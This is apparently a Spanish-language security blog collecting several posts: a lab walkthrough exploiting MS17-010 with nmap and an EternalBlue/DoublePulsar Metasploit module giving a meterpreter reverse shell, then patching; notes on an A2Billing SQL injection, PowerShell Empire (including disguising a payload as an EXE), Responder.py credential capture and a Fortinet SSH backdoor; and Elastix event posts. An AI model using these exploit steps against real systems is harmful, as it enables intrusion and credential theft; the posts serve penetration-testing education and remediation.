Explotando Vulnerabilidad MS17-010 o WannaCry

El pasado 12 de Mayo durante el desarrollo del Peruhack en Lima-Perú estallaba la noticia de un ataque global del ahora famoso ramsomware “Wanacry”  arrasando múltiples empresas, grandes y extra grandes.

La duda es, como funciona Wanacry ?
El punto de entrada inicial no era muy diferente a los ramsomware que han aparecido anteriormente y se trata de infección via corre electrónico atraves de adjuntos con malware que explotaba una vulnerabilidad hasta esa fecha “no tan conocida” luego se expandía por la redes colindantes explotando la misma vulnerabilidad.

Ello es en resumen, técnicamente hablando , la vulnerabilidad que explotada por el ransomware WanaCrypt0r o WanaCry es la denominada por el boletin oficial de Microsoft como MS17-010 la cual afecta primordialmente a Windows 7 y Windows 2008 server que fue remediada por Microsoft el 14 de marzo es decir existe un parche desde esa fecha. El tema es que existe una herramienta llamada “EternalBlue” liberada por ShadowBrokers ( un grupo de hackers involucrados en el hackeo a la NSA) la cual explota la vulnerabilidad y afecta al protocolo SMB ( Servicio para compartir archivos e impresoras) que ahora está portada a Mestasploit por Elevenpaths.

Es por ello que su propagación fue masiva debido a que basta que una sola maquina se infecte para que se propague en toda una red LAN.

A continuación vamos a hacer una prueba de concepto paso a paso de como se explota la vulnerabilidad y luego aplicaremos el parche y probaremos nuevamente.

Escenario
Atacante : Kali Linux 2016_1 / IP 192.168.56.102
Atacado : Windows 7 64Bits / IP 192.168.56.101

1- Detección de Vulnerabilidad MS17-010 (Wanacry) con Nmap
cd /usr/share/nmap/scripts
wget https://raw.githubusercontent.com/cldrn/nmap-nse-scripts/master/scripts/smb-vuln-ms17-010.nse
nmap -d -sC -p445 –script smb-vuln-ms17-010.nse 192.168.56.101

Como se puede ver el scrip de nmap nos indica que el sistema operativo es vulnerable a ms17-010 ,con la confirmación vamos a explotar.

2- Explotando la Vulnerabilidad MS17-010 (Wanacry) con Metasploit

2.1- Instalación del exploit Eternalblue-Doublepulsar en Metasploit

cd /root
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
cp /root/Eternalblue-Doublepulsar-Metasploit/eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/

2.2..- Atacando Windows 7 64Bits vulnerable

msfconsole
use exploit/windows/smb/eternalblue_doublepulsar
show info
show targets
set TARGET 8
set PAYLOAD windows/meterpreter/reverse_tcp
set PROCESSINJECT explorer.exe
set LHOST 192.168.56.102
set LPORT 4444
set RHOST 192.168.56.101
exploit

Como vemos se genera la sesión de Meterpreter

2.1- Aplicando Parche y Probando que la vulnerabilidad

2.1- Aplicando Parche UPDATE de seguridad para MS17-010

Descargamos la actualización oficial desde :

http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212

Aplicamos el parche

2.2- Validando que la vulnerabilidad fue parchada

Validando con Nmap

Validando nuevamente con Metasploit

Como vemos luego de a ver aplicado el parche ya no es posible tomar el control del sistema, asi que a realizar las actualizaciones antes que se infecten.

Saludos
Juan Oliva
@jroliva

 

Vulnerabilidad en A2BILLING ELASTIX 2.5 2.4 thanku-outcall iridium_threed.php

Por experiencia algunas vulnerabilidades toman un tiempo en “madurar” o hacerse masivas, esto ha pasado con está específicamente. En estas ultimas semanas he recibido muchas noticias y comentarios de hackeos a plantas, PBX, Centrales basadas en Elastix 2.4 y 2.5 en donde se crean un contexto llamado thanku-outcall esto por lo general, nombre del contexto puede cambiar evidentemente,  el objetivo es que se crea un contexto que permite sacar llamadas o en algunos casos mas creativos permiten originar llamadas solo para abrir un canal hacia un 0800 por ejemplo.

Como ingresan ? Cual es el punto de acceso?
Pues para variar el punto de acceso es vía Web ( Puerto 80, 443)  se trata de un archivo vulnerable en A2billing específicamente el archivo “iridium_threed.php” el cual permite una inyeccion SQL el cual inserta un registro en el servidor de base de datos de esta forma:

Luego de ello se crea un contexto en el archivo extensions_custom.conf alguna variante puede hasta crear un archivo en el directorio de publicación de apache.

La vulnerabilidad es clasificada como crítica. El punto de acceso es una función desconocida del archivo a2billing/customer/iridium_threed.php del componente Billing es afectada por esta vulnerabilidad. Mediante la manipulación del parámetro transactionID de un input desconocido se causa una vulnerabilidad de tipo sql injection.

La vulnerabilidad fue publicada el 2015-03-07 en exploitdb  la cual pueden verificar en https://www.exploit-db.com/exploits/36305/. La vulnerabilidad es identificada como CVE-2015-1875. La explotación se considera fácil. El ataque se puede efectuar a través de la red. La explotación no necesita ninguna autenticación específica.

Como parcho , Como lo corrijo o mitigo?
Si necesitas A2billing , es migrar a la versión superior, ya que la que trae Elastix es una version bastante antigua,  sin embargo sabemos que en las PBX no necesitas este software, lo recomiendo personalmente  es eliminarlo sacar del directorio de publicación de apache la carpeta A2billing.

Y si no tengo publicado mi Elastix no me interesa ?
Pues si te debería interesar ya que los hackeos no necesariamente vienen desde afuera, ahora con las vulnerabilidades como wanacry no te puedes fiar de tu red interna.

Y si tengo Issabel PBX o FreePBX ?
Pues para tranquilidad Issabel o FreePbx no trae A2billing fue un gran acierto eliminar aplicaciones “extra”

Espero les sirva la info.
Juan Oliva
@jroliva

 

 

 

 

Powershell Empire tomando el control de Windows 8.1

EmpireDurante las labores de un proyecto de Ethical Hacking / Pentesting, es necesario desarrollar en actividades que involucran, ataques de ingeniería social y/o  ataques del lado del cliente.

En cualquier de los casos, la actividad a desarrollar es comprometer el computador de los usuarios evaluados, con el objetivo de validar la educacion informatica de los usuarios frente a este tipo de ataques y también que tan buenos son los controles de malware y/o antivirus locales o instalados en el perímetro.

Para estos casos una de las herramientas que en la practica tiene mucho éxito es Powershell Empire.

empire

 

 

 

 

 

 

Powershell Empire como sus propios creadores lo denominan es un agente de Post-explotación que implementa la capacidad de ejecutar agentes de PowerShell sin necesidad de powershell.exe  cuenta con módulos de post-explotación que son rápidamente desplegables que van desde key loggers a Mimikatz,

Instalarlo sobre Kali Linux es muy sencillo, basta con hacer un git clone de repositorio :

https://github.com/adaptivethreat/Empire.git

P.O.C. De demostración

 

Evidentemente ese bat es posible convertirlo a un archivo EXE y camuflarlo cambiándole el icono, con lo cual tendríamos un archivo mucho mas atractivo para el usuario final.

En un segundo post, veremos como generar una macro con Empire para infectar un archivo de MS. Office.

Saludos
Juan Oliva

Capturando Credenciales con Responder.py

responderResponder.py , es una herramienta desarrollada por Trustwave SpiderLabs, la cual  puede responder a las consultas LLMNR y NBT-NS dando su propia dirección IP como destino para cualquier nombre de host solicitado.

Pero Cómo trabaja ?

Para entender como trabaja, es necesario conocer como funcionan las peticiones de recursos de red en una red Windows, ya que justamente, es posible abusar del comportamiento predeterminado de los servicios de resolución de nombres que usa Microsoft Windows con el objetivo de robar credenciales de autenticación.

Desmenuzando el comportamiento

Si un cliente de Windows no puede resolver un nombre de host utilizando el servicio DNS, este utilizará el protocolo de resolución de nombres de multidifusión o mejor llamado “LLMNR” para pedir a los equipos vecinos resolver las direcciones IPv4 e inclusive bajo IPv6.

Si la solicitud usando LLMNR falla, se utilizará el protocolo NetBios Name Service o NBT-NS el cual cumple el mismo objetivo que el anterior. 

Entonces, cuando un host utiliza LLMNR o NBT-NS para resolver una solicitud de un recurso de red, es posible que cualquier host de la red que conozca la dirección IP del host al que se le pregunte puede responder. Incluso si un host responde a una de estas solicitudes con información incorrecta, todavía se considerará como legítimo, en esa etapa en donde se sitúa la herramienta Responder.py para capturar credenciales.

Gráficamente sería lo siguiente:

responder

Responder.py no solo para LLMNR o NBT-NS

Responder.py por si fuera poco, además viene con varios servidores de autenticación falsos (HTTP/SMB/MSSQL/FTP/LDAP) que soportan NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP y autenticación HTTP básica.

Para qué sirve en un servicio de Pentesting ?

eh

 

 

 

 

 

Para los que nos dedicamos a esto, sabemos que la captura de credenciales mediante fuerza bruta es un proceso que difícilmente se puede realizar con buenos margenes de éxito debido al corto tiempo con el que se cuenta, en este caso Responder.py surge como una técnica muy buena para ello, poder realizar captura de credenciales y conseguir ingresar a estaciones y/o servidores además de realizar post explotación evidentemente.

P.O.C. Veamos una demo del funcionamiento.

Mas adelante veremos otros de escenarios de aplicacion de responder.py durante un pentesting.

Saludos
Juan Oliva

 

Fortinet SSH Backdoor Exploit P.O.C.

fortinet-backdoor-welcomeHace solo un par de semanas el mundo de uno de los mas famosos UTMs del mercado Fortinet, fue remecido por la divulgación de una puerta trasera de acceso a sus equipos.

Inicialmente se reveló un script que sacaba provecho a un método de “soporte” usado por el personal de firma para brindar ayuda, si bien es cierto este método tenia involucrado la generación de claves aleatorias, sin embargo usaba un algoritmo al parecer bastante sencillo.

Por supuesto luego de a ver sido revelado este “método” apareció un script en Python que explota y automatiza la apertura de un shell mediante SSH.

Cabe señalar que la firma emitió un comunicado (ver aquí) en donde aduce que lo revelado se trata de un problema de gestión y no de un puerta trasera, lo real es que ahora la vulnerabilidad afecta a las versiones 4.X hasta las 5.0.7 del sistema operativo.

Aquí el P.O.C. que realicé contra un Fortinet VM

Es claro que todos los equipos que tengan la versiones afectadas y que tengan SSH abierto, es altamente recomendable actualizar (pagar la licencia) para evitar ser comprometidos.

Espero les sirva
Juan Oliva
@jroliva

 

Configurando seguridad en Elastix MT

ElastixMT

Configuración y dinámica de mi charla realizada en el ElastixWorld de Colombia para lograr configurar el módulo PIKE en Elastix MT

1.- Activar la variable en las definiciones globales
ElastixMT
2.- Verificar la carga del módulo

ElastixMT
3.- Configurar el módulo PIKE a gusto 😀

ElastixMT
4.- Evaluar en la lógica de enrutamiento

ElastixMT

Descargar archivo de configuración
http://www.silcom.com.co/configuration/kamailio.cfg

Vídeo de demostración

Espero les sirva
Saludos
@jroliva

ElastixWorld 2015 – Nos vemos en Colombia!!

elastixComo todos los años este 7 de octubre se realizará uno de los eventos más importantes relacionados con el mundo de la VoIP y comunicaciones basadas en software libre.

ElastixWorld , no solo reunirá durante 2 días a las mejores marcas del mercado de telefonía IP como Openvox, Sangoma, Xmartek , Dinstar, Grandstream, Yealink, entre otras, las cuales mostrarán hardware y harán demos en vivo en los stands, si no también juntará a un conjunto de expositores de nivel mundial, que presentarán charlas sobre estudios, casos de éxito en VoIP relacionado con software Libre, presentando temas como balanceo , escalabilidad, programación con  REST , desarrollo con WebRTC , seguridad, etc.

Pueden ver el detalle de las charlas aquí : http://www.elastixworld.com/2015/conferencistas/

En mi caso, este año, tendré el gusto de participar con la charla “Usando el módulo PIKE en Elastix MT”

elastix
En donde haremos textualmente un “hacking” a Elastix MT, pero está vez no será para buscar vulnerabilidades,  si no “hacking” para entender como funciona por dentro, esta relación asombrosa que han conseguido entre kamailio y Asterisk  para luego ingresar al área de la seguridad y ataques, en donde mostraré la configuración y  funcionamiento en vivo del modulo PIKE en está plataforma la cual  es muy interesante, sobre todo para operadores de telefonía o empresas que desean hacer virtual PBX entre otras cosas.

Este año como novedad existirá un stand donde estarán todos los instructores oficiales de Elastix denominado “Elastix Guru” para los asistentes que deseen hacer consultas o dudas de este campo, espero tener el gusto de conocer en ese espacio, a mas de uno que visita este blog.

elastix
Otra actividad que tiene mucha expectativa es el lanzamiento oficial de Elastix 4 a cargo del su creado Edgar Landivar, en donde la mayor feature es que estará basada en Centos 7 lo cual representa una salto muy importante en está rama de la distribución.

elastix

Es así que si estas en Colombia, es un evento al cual no puedes dejar de asistir y si no lo estás,  aún tienes tiempo para comprar tu pasaje y estar presente, realmente lo recomiendo ya que se nutrirán de mucho conocimiento, no solo de VoIP , si no también de soluciones basadas en software libre enfocadas a las comunicaciones IP.

Entonces … nos vemos en Colombia!!

Saludos
Juan Oliva
@jroliva